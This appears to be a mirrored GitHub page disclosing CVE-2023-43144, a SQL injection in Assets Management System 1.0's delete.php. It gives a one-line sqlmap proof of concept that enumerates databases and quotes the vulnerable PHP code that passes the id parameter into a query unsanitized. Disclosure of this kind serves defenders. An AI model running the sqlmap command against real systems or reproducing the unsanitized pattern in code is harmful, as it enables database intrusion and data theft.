Giters

Pegasus0xx / CVE-2023-43144

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-43144

Description

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

PoC

sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

alt text

Code review (delete.php)

 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php');

There is no validation or sanitization of the $id variable. It means that any value provided by a user as the id parameter, will be directly used in the SQL query

About

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php